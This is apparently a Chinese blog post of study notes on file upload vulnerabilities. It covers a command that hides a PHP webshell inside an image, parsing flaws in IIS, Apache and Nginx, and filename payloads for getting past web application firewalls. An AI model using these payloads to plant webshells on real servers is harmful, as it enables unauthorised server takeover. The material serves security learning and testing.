文件上傳筆記

1. 圖片一句話木馬

copy 1.png /b + shell.php /a webshell.jpg

2. 中間件解析漏洞

image.png
  • iis6.0的特點(diǎn):
    文件夾形式:image.asp/qq.jpg的話,qq.jpg就會(huì)被當(dāng)成asp文件進(jìn)行執(zhí)行
    文件形式:image.asp;.jpg或者xxx.asp;xxx.jpg此文件會(huì)被當(dāng)成asp文件執(zhí)行,而且asp也可以換成PHP
  • Apache 解析漏洞-低版本
    2.php.xxx 會(huì)從右到左一直到可以解析的后綴進(jìn)行解析
    換行解析漏洞 在.php%oa會(huì)被解析為PHP文件
  • NGINX解析漏洞
    nginx 1.x php 7.x 版本: 在圖片地址如 1.png后添加任意 不存在的php文件, 圖片將會(huì)被解析為php, 如 1.png/xxx.php
    nginx文件名解析漏洞,
    image.png

上傳1.gif(空格)=>抓包修改文件名的十六進(jìn)制數(shù)據(jù)1.gif[0x20] [0x00]=>訪問(wèn)上傳的文件地址1.gif[0x20][0x00].php

3. 文件上傳漏洞總結(jié)

  1. 查看中間件,是否存在解析漏洞(iis/apache/nginx)
  2. 文件上傳漏洞點(diǎn)的識(shí)別
    字典掃描路徑,會(huì)員中心,更換頭像等等
  3. 文件上傳漏洞分類(lèi)(代碼層面)
    黑名單,白名單,文件內(nèi)容/類(lèi)型及其它
  4. 查看是否是CMS漏洞
  5. 查找是否存在編輯器
  6. 查找是否有相關(guān)的CVE漏洞

4.waf繞過(guò)

  • 數(shù)據(jù)溢出-防匹配(xxx...)
  • 符號(hào)變異-防匹配(' " ;)
filename=x.php
filename="x.php
filename='x.php
filename=x.php
filename="a.jpg;.php";
  • 數(shù)據(jù)截?cái)?防匹配(%00 換行 空格 )
filename="a.php%00.jpg"
filename="Content-Disposition : form-data;name="upload_file" ; x.php"
filename="x.jpg" ; filename="x.jpg" ; . . . ..filename="x.php";
//換行繞過(guò)
filename=
"
x
.
p
h
p
"
;
  • 重復(fù)數(shù)據(jù)-防匹配(參數(shù)多次)
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 客戶端繞過(guò) 上傳一個(gè)PHP文件 點(diǎn)開(kāi)網(wǎng)絡(luò)查看 下面未有請(qǐng)求(同時(shí)彈窗說(shuō)文件不合法) 這時(shí)候需要抓包 改包里的文件格...
    宋陽(yáng)迪閱讀 373評(píng)論 0 0
  • 這是一篇網(wǎng)絡(luò)安全小白寫(xiě)的筆記。 目錄 0 文件上傳漏洞概述 1 利用文件名及文件類(lèi)型名類(lèi)漏洞1.1 javasc...
    丁止戈閱讀 1,661評(píng)論 0 4
  • 什么是文件上傳漏洞? 文件上傳漏洞是指由于程序員在對(duì)用戶文件上傳部分的控制不足或者處理缺陷,而導(dǎo)致的用戶可以越過(guò)其...
    Smi1e_閱讀 25,256評(píng)論 0 24
  • 0x01 文件上傳漏洞 文件上傳漏洞顧名思義就是用戶上傳一個(gè)可執(zhí)行的腳本文件,獲得了執(zhí)行服務(wù)器端命令的能力。通常,...
    Pino_HD閱讀 1,963評(píng)論 0 0
  • 文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件,并通過(guò)此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。這種攻擊方式是最為直...
    付出從未后悔閱讀 1,252評(píng)論 0 4

友情鏈接更多精彩內(nèi)容